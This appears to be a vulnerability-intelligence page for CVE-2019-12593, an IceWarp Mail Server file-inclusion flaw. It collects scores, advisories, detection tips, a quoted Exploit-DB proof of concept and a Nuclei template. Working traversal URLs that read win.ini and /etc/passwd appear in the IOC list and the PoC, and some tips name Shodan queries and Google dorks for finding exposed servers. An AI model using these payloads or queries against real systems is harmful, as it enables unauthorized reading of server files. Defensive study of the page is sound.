CVE-2019-12593
published 2019-06-03CVE-2019-12593: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
PriorityP179high7.5CVSS 3.0
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
40.97%
98.5th percentile
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| icewarp | mail_server | <= 10.4.4 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini↗
url/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd↗
- →Detect LFI exploitation attempts by monitoring HTTP GET requests to /webmail/calendar/minimizer/index.php containing the 'style' parameter with encoded backslash traversal sequences (%5c). ↗
- →A successful exploitation response for Windows targets will contain the string '[intl]' (from win.ini); for Linux targets it will contain 'root:x:0' (from /etc/passwd). Alert on HTTP 200 responses from the vulnerable path containing these strings. ↗
- →Use Shodan/FOFA queries to identify exposed IceWarp instances as potential targets: search for title 'icewarp' or 'icewarp server administration'. ↗
- →Google dork 'Powered By IceWarp 10.4.4' or 'intitle:"icewarp server administration"' can identify publicly exposed vulnerable instances. ↗
- ·The traversal payload uses Windows-style encoded backslashes (%5c). On Linux targets, the path separator differs; the nuclei template uses a mixed path ('..%5c..%5c.../etc%5cpasswd') suggesting the server may normalize separators. Adjust traversal depth and separator encoding based on target OS. ↗
- ·The exploit was tested on Windows 10. The traversal depth used is 8 levels (..%5c repeated 8 times) to reach the filesystem root; fewer levels may be needed depending on the IceWarp installation path. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-46v5-x5rw-m988: IceWarp Mail Server through 10
ghsa_unreviewed·2022-05-24
CVE-2019-12593 [HIGH] GHSA-46v5-x5rw-m988: IceWarp Mail Server through 10
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
VulnCheck
icewarp mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2019·CVSS 7.5
CVE-2019-12593 [HIGH] icewarp mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
icewarp mail_server Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
Affected: icewarp mail_server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-26&host_type=src&vulnerability=cve-2019-12593; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-14&host_type=src&vulnerability=cve-2019-12593; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
No detection rules found.
Exploit-DB
IceWarp 10.4.4 - Local File Inclusion
exploitdb·2019-06-04·CVSS 7.5
CVE-2019-12593 [HIGH] IceWarp 10.4.4 - Local File Inclusion
IceWarp 10.4.4 - Local File Inclusion
---
# Exploit Title: IceWarp <=10.4.4 local file include
# Date: 02/06/2019
# Exploit Author: JameelNabbo
# Website: uitsec.com
# Vendor Homepage: http://www.icewarp.com
# Software Link: https://www.icewarp.com/downloads/trial/
# Version: 10.4.4
# Tested on: Windows 10
# CVE: CVE-2019-12593
POC:
http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
Example:
http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
Nuclei
IceWarp Mail Server <=10.4.4 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2019-12593 [HIGH] IceWarp Mail Server <=10.4.4 - Local File Inclusion
IceWarp Mail Server <=10.4.4 - Local File Inclusion
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
Template:
id: CVE-2019-12593
info:
name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
author: pikpikcu
severity: high
description: |
IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
impact: |
An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
remediation: |
Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
ref
http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.htmlhttps://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txthttp://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.htmlhttps://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
2019-06-03
Published
Exploited in the wild